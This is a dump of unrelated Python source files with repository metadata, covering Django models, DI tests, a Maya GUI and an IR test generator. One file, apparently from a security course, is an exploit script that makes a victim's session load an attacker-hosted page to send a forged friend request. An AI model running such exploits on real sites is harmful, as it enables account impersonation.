class MetaDBInfo(models.Model):
#we need id, db_name, db_name to show, name of the Author
id = models.AutoField(primary_key=True) #1 - ID rekordu (integer)
db_name = models.CharField(max_length=200)
real_db_name = models.CharField(max_length=200)
author = models.CharField(max_length=50)
def __str__(self) -> str:
return "Model to save meta data about existing databases"
"""
Initialise all models - initialise dynamic models
"""
meta_info = MetaDBInfo()
models = list() # List handles all models loaded, and pass to admin.py & serializers.py, it's really important list
models_from_json = json_worker.get_models("/data/models.json") # IMPORTANT: Function from json_worker.py
# models_from_json["models"] = sorted(models_from_json["models"]) # Keep the correct order in models, even when someone mades a typo and create a new model at the end of models.json with "a" on start
for model in models_from_json["models"]:
model = NewBibliographyDynamicModel(BibliographyTemplateModel, model) # Initialise new DynamicModel
model._meta.verbose_name_plural = model._meta.db_table # IMPORTANT: Set name of table in Django Admin Panel to table name - remove extra "s" from name.
models.append(model) # Append new dynamc model to list, to pass it to admin.py
| 54.105263 | 199 | 0.70642 | 661 | 5,140 | 5.30711 | 0.334342 | 0.072121 | 0.106613 | 0.099772 | 0.143387 | 0.116306 | 0.057583 | 0 | 0 | 0 | 0 | 0.014054 | 0.183268 | 5,140 | 94 | 200 | 54.680851 | 0.821582 | 0.242802 | 0 | 0 | 0 | 0 | 0.17557 | 0.006353 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.036364 | 0.036364 | 0.709091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05dcbb2c4c239f9b4a8fbabeb170702515971f70 | 1,296 | py | Python | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | import pytest
from yapic.di import Injector, InjectError, VALUE, FACTORY, SCOPED_SINGLETON, SINGLETON
def test_strategy_value():
injector = Injector()
provided = "VALUE"
injector.provide("V", provided, VALUE)
assert injector["V"] == "VALUE"
assert injector["V"] is provided
assert injector.provide("V", provided, VALUE)(injector) == "VALUE"
def test_strategy_custom():
cscope = dict()
def custom_strategy(injectable, injector):
try:
return cscope[injectable]
except KeyError:
value = cscope[injectable] = injectable(injector)
return value
class A:
pass
injector = Injector()
injector.provide(A, A, custom_strategy)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
def test_strategy_scoped_singleton():
class A:
pass
injector = Injector()
injector.provide(A, A, SCOPED_SINGLETON)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
assert injector[A] is injector[A]
def test_strategy_singleton():
class A:
pass
injector = Injector()
injector.provide(A, A, SINGLETON)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
assert injector[A] is injector[A]
| 22.736842 | 87 | 0.657407 | 153 | 1,296 | 5.48366 | 0.202614 | 0.139452 | 0.089392 | 0.095352 | 0.549464 | 0.480334 | 0.480334 | 0.480334 | 0.480334 | 0.429082 | 0 | 0 | 0.238426 | 1,296 | 56 | 88 | 23.142857 | 0.850051 | 0 | 0 | 0.461538 | 0 | 0 | 0.01466 | 0 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0.128205 | false | 0.076923 | 0.051282 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05dceb631e9e5e43e026255950937e80b089bb03 | 1,251 | py | Python | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | from requests import session, get
from random import randint
from sys import argv
from Common.Driver import runScript
SERVER = argv[1]
attackerSERVER = "http://web.tecnico.ulisboa.pt/ist190774/SSof/R2Ai2t0bslrVyMxUOUyO.html"
victimSession = session()
victimUsername = str(randint(2 ** 27, 2 ** 28))
victimPassword = str(randint(2 ** 27, 2 ** 28))
attackerSession = session()
attackerUsername = "Attacker"
attackerPassword = str(randint(2 ** 27, 2 ** 28))
# Cleaning DB
r = get(SERVER + "/init")
assert "Initialisation DONE!" in r.text
data = {
"username": attackerUsername,
"password": attackerPassword
}
r = attackerSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert attackerUsername in r.text
data = {
"username": victimUsername,
"password": victimPassword
}
r = victimSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert victimUsername in r.text
# The Victim Browser Executes the Malicious Script
# And Make a Friend Request to the Attacker Impersonating the Victim
runScript(SERVER, attackerSERVER, victimSession)
r = attackerSession.get(SERVER + "/pending_requests")
assert victimUsername in r.text
print("Success!")
victimSession.close()
attackerSession.close()
| 25.530612 | 89 | 0.745803 | 153 | 1,251 | 6.091503 | 0.437909 | 0.019313 | 0.045064 | 0.041845 | 0.255365 | 0.16309 | 0.111588 | 0.111588 | 0.111588 | 0.111588 | 0 | 0.026022 | 0.139888 | 1,251 | 48 | 90 | 26.0625 | 0.840149 | 0.101519 | 0 | 0.176471 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0 | false | 0.117647 | 0.117647 | 0 | 0.117647 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05e94465c2150fd300427ccfc108c9168a7466b4 | 315 | py | Python | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null |
"""
任务:
1、就是普通函数
2、该函数必须通过celery的实例对象的tasks装饰其装饰
3、该任务需要让celery实例对象自动检测
4、任务(函数)需要使用任务名(函数名).delay() 进行调用
"""
from libs.yuntongxun.sms import CCP
from celery_tasks.main import app
@app.task
def send_sms_code(mobile,sms_code):
ccp = CCP()
ccp.send_template_sms(mobile, [sms_code, 5], 1)
| 16.578947 | 51 | 0.704762 | 46 | 315 | 4.673913 | 0.652174 | 0.097674 | 0.12093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023077 | 0.174603 | 315 | 18 | 52 | 17.5 | 0.803846 | 0.371429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
05eb0d02c233f0dee2324590bb3ea53e0d555dbd | 412 | py | Python | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | 5 | 2015-02-18T10:17:12.000Z | 2016-11-14T19:12:21.000Z | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | null | null | null | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | null | null | null | class Solution:
# @return an integer
def reverse(self, x):
int_max = 2147483647
limit = int_max/10
if x > 0:
sig = 1
elif x < 0:
sig = -1
x = -x
else:
return x
y = 0
while x:
if y > limit:
return 0
y = y*10 + (x % 10)
x /= 10
return y*sig
| 19.619048 | 31 | 0.359223 | 50 | 412 | 2.92 | 0.44 | 0.082192 | 0.068493 | 0.082192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132597 | 0.56068 | 412 | 20 | 32 | 20.6 | 0.674033 | 0.043689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05ec147619d0c6c159ac7693bb807a1f37686d47 | 710 | py | Python | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | import unittest
from django.core.exceptions import ValidationError
from petstagram.common.validators import MaxFileSizeInMbValidator
class FakeFile:
size = 5
class FakeImage:
file = FakeFile()
class MaxFileSizeInMbValidatorTests(unittest.TestCase):
def test_when_file_is_bigger__expect_to_raise(self):
validator = MaxFileSizeInMbValidator(0.000001)
file = FakeImage()
with self.assertRaises(ValidationError) as context:
validator(file)
self.assertIsNotNone(context.exception)
def test_when_file_size_is_valid__expect_to_do_nothing(self):
validator = MaxFileSizeInMbValidator(1)
file = FakeImage()
validator(file)
| 22.1875 | 65 | 0.73662 | 73 | 710 | 6.917808 | 0.561644 | 0.027723 | 0.043564 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015845 | 0.2 | 710 | 31 | 66 | 22.903226 | 0.873239 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.166667 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05ed9a57f5af4fea6ddb8a36da3aa0e080bf2206 | 2,348 | py | Python | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | def mangle(op, op_type, signed):
# suffixMap gives the C++ name-mangling suffixes for a function that takes two
# arguments of the given type. The first entry is for the unsigned version of
# the type, and the second entry is for the signed version.
suffixMap = { 'i1': ['bb', 'bb'],
'i8': ['hh', 'aa'],
'i16': ['tt', 'ss'],
'i32': ['jj', 'ii'],
'i64': ['yy', 'xx'],
'float': ['ff', 'ff'],
'double': ['dd', 'dd'],
'<4 x i32>': ['Dv4_jS_', 'Dv4_iS_'],
'<8 x i16>': ['Dv8_tS_', 'Dv8_sS_'],
'<16 x i8>': ['Dv16_hS_', 'Dv16_aS_'],
'<4 x float>': ['Dv4_fS_', 'Dv4_fS_'],
}
base = 'test' + op.capitalize()
return '_Z' + str(len(base)) + base + suffixMap[op_type][signed]
def arith(Native, Type, Op):
_TEMPLATE_ = """
define internal {{native}} @{{name}}({{native}} %a, {{native}} %b) {{{{
{trunc_a}
{trunc_b}
%result{{trunc}} = {{op}} {{type}} %a{{trunc}}, %b{{trunc}}
{zext}
ret {{native}} %result
}}}}"""
Signed = Op in {'sdiv', 'srem', 'ashr'}
Name = mangle(Op, Type, Signed)
# Most i1 operations are invalid for PNaCl, so map them to i32.
if Type == 'i1' and (Op not in {'and', 'or', 'xor'}):
Type = 'i32'
x = _TEMPLATE_.format(
trunc_a = '%a.trunc = trunc {native} %a to {type}' if
Native != Type else '',
trunc_b = '%b.trunc = trunc {native} %b to {type}' if
Native != Type else '',
zext = '%result = ' + ('sext' if Signed else 'zext') +
' {type} %result.trunc to {native}' if Native != Type else '')
lines = x.format(native=Native, type=Type, op=Op, name=Name,
trunc='.trunc' if Native != Type else '')
# Strip trailing whitespace from each line to keep git happy.
print '\n'.join([line.rstrip() for line in lines.splitlines()])
for op in ['add', 'sub', 'mul', 'sdiv', 'udiv', 'srem', 'urem', 'shl', 'lshr',
'ashr', 'and', 'or', 'xor']:
for op_type in ['i1', 'i8', 'i16', 'i32']:
arith('i32', op_type, op)
for op_type in ['i64', '<4 x i32>', '<8 x i16>', '<16 x i8>']:
arith(op_type, op_type, op)
for op in ['fadd', 'fsub', 'fmul', 'fdiv', 'frem']:
for op_type in ['float', 'double', '<4 x float>']:
arith(op_type, op_type, op)
| 41.192982 | 80 | 0.517036 | 327 | 2,348 | 3.605505 | 0.373089 | 0.061069 | 0.033927 | 0.054283 | 0.084818 | 0.06955 | 0 | 0 | 0 | 0 | 0 | 0.031524 | 0.270443 | 2,348 | 56 | 81 | 41.928571 | 0.656743 | 0.141823 | 0 | 0.085106 | 0 | 0.021277 | 0.318566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05f53d4427176b3d7edeff38f769638cc4082c8a | 580 | py | Python | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | from unittest import TestCase
class DiscordRemoteTestCase(TestCase):
def assertBasicEmbed(self, embeds, title, description, color, author):
self.assertEqual(1, len(embeds))
first_embed = embeds[0].get_embed()
self.assertEqual(title, first_embed['title'])
self.assertEqual(description, first_embed['description'])
self.assertEqual(color, first_embed['color'])
self.assertIsNotNone(first_embed['timestamp'])
self.assertEqual(0, len(first_embed['fields']))
self.assertEqual(author, first_embed['author']['name'])
| 41.428571 | 74 | 0.698276 | 63 | 580 | 6.301587 | 0.396825 | 0.176322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006237 | 0.17069 | 580 | 13 | 75 | 44.615385 | 0.819127 | 0 | 0 | 0 | 0 | 0 | 0.07931 | 0 | 0 | 0 | 0 | 0 | 0.727273 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05f7184b1636ce380b382f6f97cc79d0e2e8deeb | 15,251 | py | Python | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 94 | 2017-12-16T07:42:06.000Z | 2022-03-28T07:40:04.000Z | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 66 | 2017-12-02T14:30:35.000Z | 2019-01-14T01:17:38.000Z | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 27 | 2018-06-11T14:16:17.000Z | 2022-01-09T15:19:32.000Z | import os
from functools import partial
# pymel
import pymel.core as pm
# mgear
import mgear
from mgear.maya import shifter, skin, pyqt, utils
GUIDE_UI_WINDOW_NAME = "guide_UI_window"
GUIDE_DOCK_NAME = "Guide_Components"
##############################
# CLASS
##############################
class Guide_UI(object):
def __init__(self):
# Remove existing window
if pm.window(GUIDE_UI_WINDOW_NAME, exists=True):
print "deleting win"
pm.deleteUI(GUIDE_UI_WINDOW_NAME)
if pm.dockControl(GUIDE_DOCK_NAME, exists=True):
print "deleting dock"
pm.deleteUI(GUIDE_DOCK_NAME)
panelWeight = 200
scrollHight = 600
# Create Window and main tab
self.ui_window = pm.window(
GUIDE_UI_WINDOW_NAME, width=panelWeight, title="Guide Tools",
sizeable=True)
self.ui_topLevelColumn = pm.columnLayout(
adjustableColumn=True, columnAlign="center")
#
pm.columnLayout()
pm.rowLayout(numberOfColumns=1, columnWidth=[(1, panelWeight)])
pm.button(label="Settings", w=panelWeight, h=30,
bgc=[.042, .351, .615],
command=partial(self.inspectSettings))
pm.setParent('..')
pm.rowLayout(numberOfColumns=3, columnWidth=[
(1, (panelWeight / 3) - 1),
(2, (panelWeight / 3) - 1),
(3, (panelWeight / 3) - 1)])
pm.button(label="Dupl.", w=(panelWeight / 3) - 1, h=23,
bgc=[.311, .635, 0], command=partial(self.duplicate, False))
pm.button(label="Dupl. Sym", w=(panelWeight / 3) - 1, h=23,
bgc=[.465, .785, .159],
command=partial(self.duplicate, True))
pm.button(label="Extr. Ctl", w=(panelWeight / 3) - 1, h=23,
bgc=[.835, .792, .042],
command=partial(self.extractControls))
pm.setParent('..')
pm.rowLayout(numberOfColumns=1, columnWidth=[(1, panelWeight)])
pm.button(label="Build from selection", w=panelWeight, h=30,
bgc=[.912, .427, .176],
command=partial(self.buildFromSelection))
pm.setParent('..')
self.ui_tabs = pm.tabLayout(
width=panelWeight, innerMarginWidth=5, innerMarginHeight=5)
pm.tabLayout(self.ui_tabs, q=True, width=True)
#
self.ui_compColumn = pm.columnLayout(adj=True, rs=3)
self.ui_compFrameLayout = pm.frameLayout(
height=scrollHight, collapsable=False, borderVisible=False,
labelVisible=False)
self.ui_compList_Scroll = pm.scrollLayout(hst=0)
self.ui_compList_column = pm.columnLayout(
columnWidth=panelWeight, adj=True, rs=2)
pm.separator()
# List of components
# doGrouping = 1 < len(shifter.COMPONENTS_DIRECTORIES.keys())
compDir = shifter.getComponentDirectories()
trackLoadComponent = []
for path, comps in compDir.iteritems():
pm.text(align="center", label=os.path.basename(path))
pm.separator()
for comp_name in comps:
if comp_name in trackLoadComponent:
pm.displayWarning(
"Custom component name: %s, already in default "
"components. Names should be unique. This component is"
" not loaded" % comp_name)
continue
else:
trackLoadComponent.append(comp_name)
if not os.path.exists(os.path.join(path,
comp_name, "__init__.py")):
continue
module = shifter.importComponentGuide(comp_name)
reload(module)
image = os.path.join(path, comp_name, "icon.jpg")
buttonSize = 25
textDesc = "Name: " + module.NAME + "\nType:: " + \
module.TYPE + "\n===========\nAuthor: " + \
module.AUTHOR + "\nWeb: " + module.URL + \
"\nEmail: " + module.EMAIL + \
"\n===========\nDescription:\n" + module.DESCRIPTION
pm.rowLayout(numberOfColumns=2,
columnWidth=([1, buttonSize]),
adjustableColumn=2,
columnAttach=([1, "both", 0], [2, "both", 5]))
pm.symbolButton(ann=textDesc,
width=buttonSize,
height=buttonSize,
bgc=[0, 0, 0],
ebg=False, i=image,
command=partial(self.drawComp, module.TYPE))
pm.columnLayout(columnAlign="center")
pm.text(align="center", width=panelWeight * .6,
label=module.TYPE, ann=textDesc, fn="plainLabelFont")
pm.setParent(self.ui_compList_column)
pm.separator()
# Display the window
pm.tabLayout(self.ui_tabs, edit=True,
tabLabelIndex=([1, "Components"]))
allowedAreas = ['right', 'left']
pm.dockControl(GUIDE_DOCK_NAME, area='right', content=self.ui_window,
allowedArea=allowedAreas, width=panelWeight, s=True)
def drawComp(self, compType, *args):
guide = shifter.guide.Rig()
if pm.selected():
parent = pm.selected()[0]
else:
parent = None
guide.drawNewComponent(parent, compType)
# @utils.one_undo
@classmethod
def buildFromSelection(self, *args):
logWin = pm.window(title="Shifter Build Log", iconName='Shifter Log')
pm.columnLayout(adjustableColumn=True)
pm.cmdScrollFieldReporter(width=800, height=500, clr=True)
pm.button(label='Close', command=(
'import pymel.core as pm\npm.deleteUI(\"' + logWin +
'\", window=True)'))
pm.setParent('..')
pm.showWindow(logWin)
mgear.logInfos()
rg = shifter.Rig()
rg.buildFromSelection()
@classmethod
def duplicate(self, sym, *args):
oSel = pm.selected()
if oSel:
root = oSel[0]
guide = shifter.guide.Rig()
guide.duplicate(root, sym)
else:
mgear.log("Select one component root to edit properties",
mgear.sev_error)
return
@classmethod
def inspectSettings(self, *args):
oSel = pm.selected()
if oSel:
root = oSel[0]
else:
pm.displayWarning(
"please select one object from the componenet guide")
return
comp_type = False
guide_root = False
while root:
if pm.attributeQuery("comp_type", node=root, ex=True):
comp_type = root.attr("comp_type").get()
break
elif pm.attributeQuery("ismodel", node=root, ex=True):
guide_root = root
break
root = root.getParent()
pm.select(root)
if comp_type:
guide = shifter.importComponentGuide(comp_type)
pyqt.showDialog(guide.componentSettings)
elif guide_root:
module_name = "mgear.maya.shifter.guide"
guide = __import__(module_name, globals(), locals(), ["*"], -1)
pyqt.showDialog(guide.guideSettings)
else:
pm.displayError(
"The selected object is not part of component guide")
@classmethod
def inspectProperties(self, *args):
modeSet = ["FK", "IK", "IK/FK"]
rotOrderSet = ["XYZ", "YZX", "ZXY", "XZY", "YXZ", "ZYX"]
guideModeSet = ["Final", "WIP"]
# apply changes
def applyCloseGuide(root, *args):
if pm.attributeQuery("mode", node=root, ex=True):
root.attr("mode").set(guideModeSet.index(pMode.getValue()))
pm.select(root, r=True)
pm.deleteUI(window, window=True)
def skinLoad(root, *args):
startDir = root.attr("skin").get()
filePath = pm.fileDialog2(
dialogStyle=2,
fileMode=1,
startingDirectory=startDir,
fileFilter='mGear skin (*%s)' % skin.FILE_EXT)
if not filePath:
return
if not isinstance(filePath, basestring):
filePath = filePath[0]
root.attr("skin").set(filePath)
def applyCloseComp(root, *args):
newName = pName.getText()
newSide = pSide.getValue()
newIndex = pIndex.getValue1()
if pm.attributeQuery("mode", node=root, ex=True):
root.attr("mode").set(modeSet.index(pMode.getValue()))
if pm.attributeQuery("default_rotorder", node=root, ex=True):
root.attr("default_rotorder").set(
rotOrderSet.index(pRotOrder.getValue()))
guide = shifter.guide.Rig()
guide.updateProperties(root, newName, newSide, newIndex)
pm.select(root, r=True)
pm.deleteUI(window, window=True)
if pm.window("compProperties", exists=True):
pm.deleteUI("compProperties")
oSel = pm.selected()
if oSel:
root = oSel[0]
else:
mgear.log(
"Select one root Guide or component to edit properties",
mgear.sev_error)
return
if pm.attributeQuery("comp_type", node=root, ex=True):
# property window constructor
customAttr = pm.listAttr(root, ud=True)
window = pm.window(title=root.name())
pm.columnLayout(adjustableColumn=True, cal="right")
for attr in customAttr:
if attr == "comp_name":
fl = pm.formLayout()
oriVal = root.attr("comp_name").get()
pName = pm.textFieldGrp(label="comp_name")
pm.setParent('..')
pm.formLayout(fl, e=True, af=(pName, "left", 0))
pName.setText(oriVal)
elif attr == "comp_side":
sideSet = ["C", "L", "R"]
fl = pm.formLayout()
pSide = pm.optionMenu(label="comp_side")
pSide.addMenuItems(sideSet)
pSide.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pSide, "left", 90))
oriVal = root.attr("comp_side").get()
pSide.setValue(oriVal)
elif attr == "mode":
fl = pm.formLayout()
pMode = pm.optionMenu(label="mode")
pMode.addMenuItems(modeSet)
pMode.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pMode, "left", 115))
oriVal = root.attr("mode").get()
pMode.setValue(modeSet[oriVal])
elif attr == "default_rotorder":
fl = pm.formLayout()
pRotOrder = pm.optionMenu(label="default_rotorder")
pRotOrder.addMenuItems(rotOrderSet)
pRotOrder.setWidth(140)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pRotOrder, "left", 60))
oriVal = root.attr("default_rotorder").get()
pRotOrder.setValue(rotOrderSet[oriVal])
elif attr == "comp_index":
fl = pm.formLayout()
oriVal = root.attr("comp_index").get()
pIndex = pm.intFieldGrp(v1=oriVal, label="comp_index")
pm.setParent('..')
pm.formLayout(fl, e=True, af=(pIndex, "left", 0))
else:
editable = True
if attr == "comp_type":
editable = False
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(
attr), po=True, en=editable)
pm.setParent('..')
pm.button(label='Apply', command=partial(
applyCloseComp, root), h=100)
pm.setParent('..')
pm.showWindow(window)
elif pm.attributeQuery("ismodel", node=root, ex=True):
# property window constructor
customAttr = pm.listAttr(root, ud=True)
window = pm.window(title=root.name())
pm.columnLayout(adjustableColumn=True, cal="right")
for attr in customAttr:
if attr.split("_")[-1] not in ["r", "g", "b"]:
if attr == "mode":
fl = pm.formLayout()
pMode = pm.optionMenu(label="mode")
pMode.addMenuItems(guideModeSet)
pMode.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pMode, "left", 115))
oriVal = root.attr("mode").get()
pMode.setValue(guideModeSet[oriVal])
elif attr == "skin":
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(attr), po=True)
pm.setParent('..')
pm.button(label='Load Skin ',
command=partial(skinLoad, root))
else:
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(attr), po=True)
pm.setParent('..')
pm.button(label='Apply', command=partial(
applyCloseGuide, root), h=50)
pm.setParent('..')
pm.showWindow(window)
else:
mgear.log(
"Select a root Guide or component to edit properties",
mgear.sev_error)
return
def extractControls(self, *args):
oSel = pm.selected()
try:
cGrp = pm.PyNode("controllers_org")
except TypeError:
cGrp = False
mgear.log(
"Not controller group in the scene or the group is not unique",
mgear.sev_error)
for x in oSel:
try:
old = pm.PyNode(cGrp.name() + "|" +
x.name().split("|")[-1] + "_controlBuffer")
pm.delete(old)
except TypeError:
pass
new = pm.duplicate(x)[0]
pm.parent(new, cGrp, a=True)
pm.rename(new, x.name() + "_controlBuffer")
toDel = new.getChildren(type="transform")
pm.delete(toDel)
try:
pm.sets("rig_controllers_grp", remove=new)
except TypeError:
pass
| 37.288509 | 79 | 0.499967 | 1,451 | 15,251 | 5.188146 | 0.242591 | 0.023379 | 0.024176 | 0.013018 | 0.330765 | 0.267269 | 0.25186 | 0.230739 | 0.201116 | 0.178666 | 0 | 0.016059 | 0.379385 | 15,251 | 408 | 80 | 37.379902 | 0.779292 | 0.016458 | 0 | 0.346626 | 0 | 0 | 0.090117 | 0.005025 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.006135 | 0.027607 | null | null | 0.006135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05fe83150bd16fbe021adff0767ad7e4b00d8b44 | 4,634 | py | Python | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | null | null | null | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | null | null | null | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | 1 | 2021-01-24T17:07:37.000Z | 2021-01-24T17:07:37.000Z | from . import fnoUtils as utils
class StkOptDailyDataWrapper:
def __init__(self, dailyData):
